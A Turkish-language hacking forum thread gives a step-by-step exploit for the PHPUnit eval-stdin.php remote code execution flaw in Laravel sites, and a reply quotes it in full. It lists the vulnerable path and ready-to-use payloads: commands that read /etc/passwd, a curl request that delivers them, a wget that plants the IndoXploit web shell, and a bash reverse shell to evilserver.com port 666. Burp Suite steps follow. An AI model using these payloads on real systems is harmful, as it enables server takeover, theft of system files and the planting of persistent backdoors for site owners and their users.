Laravel PHPUnit Remote Code Execution (RCE) (1 Viewer)

C

Crysuder

  • Vuln: eval-stdin.php
  • Tam Yol Exploit: http: // target /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Etkilenen sürümler: 4.8.28 öncesi ve 5.6.3 öncesi 5.x öncesi
Burp Suite, Postacı veya curl kullanarak veri göndermekte özgürsünüz. Burada ilk önce kıvırmayı kullanarak paylaşıyorum çünkü bence bu en basit olanı.

Yükü göndermek için -d veya -data parametresini kullanın. Kullanılabilecek yük kapasitesi:
View hidden content is available for registered users!

<?php system('tail /etc/passwd'); ?> <?php echo php_uname(); ?> <?php show_source('/etc/passwd'); ?>



Örnek komut

View hidden content is available for registered users!

curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php



rce-phpunit.png

Eğer kabuğu çıkarmak istiyorsanız, sadece kullanmanız gereken yükü değiştirmeniz gerekiyor.

View hidden content is available for registered users!

<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?>



Veya backconnect bağlantı komu

View hidden content is available for registered users!

<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?>



Ardından, sunucuda, 666 numaralı bağlantı noktasına taşınır .

request.png


connected.png



Veya Burpsuite'i kullanabilirsiniz.

Araya gir, sonra isteği tekrarlayıcıya gönder.


burp1.png


Ardından Tekrarlayıcı menüsünü tıklayın , aşağıya yükü girin ve Git düğmesine tıklayın .



burp2.png


Yanıt, istek sütununun yanında görülebilir (sağda).


burp3.png
 

Adamındibi

OROSPU EVLADIYIM
Joined
Aug 29, 2019
Credits
0
Rating - 0%
  • Vuln: eval-stdin.php
  • Tam Yol Exploit: http: // target /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Etkilenen sürümler: 4.8.28 öncesi ve 5.6.3 öncesi 5.x öncesi
Burp Suite, Postacı veya curl kullanarak veri göndermekte özgürsünüz. Burada ilk önce kıvırmayı kullanarak paylaşıyorum çünkü bence bu en basit olanı.

Yükü göndermek için -d veya -data parametresini kullanın. Kullanılabilecek yük kapasitesi:
View hidden content is available for registered users!

<?php system('tail /etc/passwd'); ?> <?php echo php_uname(); ?> <?php show_source('/etc/passwd'); ?>



Örnek komut

View hidden content is available for registered users!

curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php



rce-phpunit.png

Eğer kabuğu çıkarmak istiyorsanız, sadece kullanmanız gereken yükü değiştirmeniz gerekiyor.

View hidden content is available for registered users!

<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?>



Veya backconnect bağlantı komu

View hidden content is available for registered users!

<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?>



Ardından, sunucuda, 666 numaralı bağlantı noktasına taşınır .

request.png


connected.png



Veya Burpsuite'i kullanabilirsiniz.

Araya gir, sonra isteği tekrarlayıcıya gönder.


burp1.png


Ardından Tekrarlayıcı menüsünü tıklayın , aşağıya yükü girin ve Git düğmesine tıklayın .



burp2.png


Yanıt, istek sütununun yanında görülebilir (sağda).


burp3.png
teşekkür ederim @Hector
 

Users who are viewing this thread

Top